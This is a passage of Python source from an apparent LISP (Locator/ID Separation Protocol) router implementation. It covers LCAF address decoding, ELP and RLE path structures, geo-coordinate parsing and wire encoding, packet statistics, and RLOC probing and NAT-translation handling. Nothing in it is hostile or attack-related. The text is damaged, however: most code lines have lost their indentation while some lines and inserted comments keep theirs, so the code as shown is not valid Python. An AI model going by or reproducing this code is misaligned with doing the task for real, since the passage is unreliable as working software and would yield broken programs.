if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
        # Get AFI and group address. Validate that there is enough length
        # and that there are bytes remaining in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
        addr_length = group.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return([None, None])
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return([None, None])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
            if (lcaf_len > len(packet)): return([None, None])
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
        elp_node.address.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
        # If we did not find a match, this is possibly an ITR. We need to
        # give it the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
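    #
    # For example, with ELP nodes [A, B, C]: if a local RLOC matches B,
    # use_elp_node is C (the next hop in the path); if it matches C, we
    # are the end of the path and use_elp_node is None (print_elp() marks
    # this with "x"); if nothing matches, we assume the ITR role and use
    # A (marked with "*").
    #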
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
        self.radius = 0
        #
        # decode_geo() can store a trailing RLOC here; initialize it so
        # the attribute always exists.
        #
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
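    #
    # For example, the geo-prefix string "45-30-10-N-122-40-55-W-50/20"
    # parses to latitude 45 degrees 30 minutes 10 seconds North (stored
    # internally as -45), longitude 122-40-55 West, altitude 50, and a
    # radius of 20. Without the "/<radius>" suffix it would be a
    # geo-point instead of a geo-prefix.
    #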
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
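    #
    # Continuing the example above, 45-30-10-N converts to decimal
    # degrees as 45 + (30 * 60 + 10) / 3600 = 45.503. The sign flip keeps
    # North latitudes positive in decimal form since they are stored
    # negative internally.
    #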
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
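    #
    # The wire format carries minutes and seconds as milliseconds of arc.
    # For example, 30 minutes 10 seconds encodes as ((30 * 60) + 10) *
    # 1000 = 1810000, split into a high byte (1810000 >> 16 == 27) and a
    # low 16-bit word.
    #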
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else ":" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
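    #
    # Build the list of RLE nodes to replicate to, assuming rle_nodes is
    # ordered by level. Find the level of this system's own RLOC and
    # forward to the nodes at the next higher level; if we are not in the
    # RLE, level 0 is used. For example, an RTR at level 0 with ETRs at
    # level 128 replicates to all the level-128 nodes.
    #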
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
            count = count[0:-12] + "." + count[-12:-10] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
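    #
    # For example, normalize(1234567) returns "1.2M" and
    # normalize(1234567890) returns "1.23B", keeping counter displays to
    # a fixed width.
    #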
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and error stats. Anytime a lisp_packet
# packet_error value is added, this dictionary needs a matching key string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This is a locator-record definition as defined in the RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
            hop = copy.deepcopy(self)
            hop.next_rloc = None   # Detach any next_rloc chain the deepcopy copied
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
        if (self.state == LISP_RLOC_UNKNOWN_STATE):
            return("unknown-state")
        if (self.state == LISP_RLOC_UP_STATE):
            return("up-state")
        if (self.state == LISP_RLOC_DOWN_STATE):
            return("down-state")
        if (self.state == LISP_RLOC_ADMIN_DOWN_STATE):
            return("admin-down-state")
        if (self.state == LISP_RLOC_UNREACH_STATE):
            return("unreach-state")
        if (self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE):
            return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
                # RLOC-record is different from the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
            # Check to see if the RLOC for the map-cache is the same RLOC
            # as in the NAT state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
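    #
    # The hops string displays as "to-hops/from-hops", where "?" means no
    # hop-count information was returned and "!" flags a direction that
    # consumed more than half of the probe's initial TTL, which suggests
    # a suspiciously long path.
    #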
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
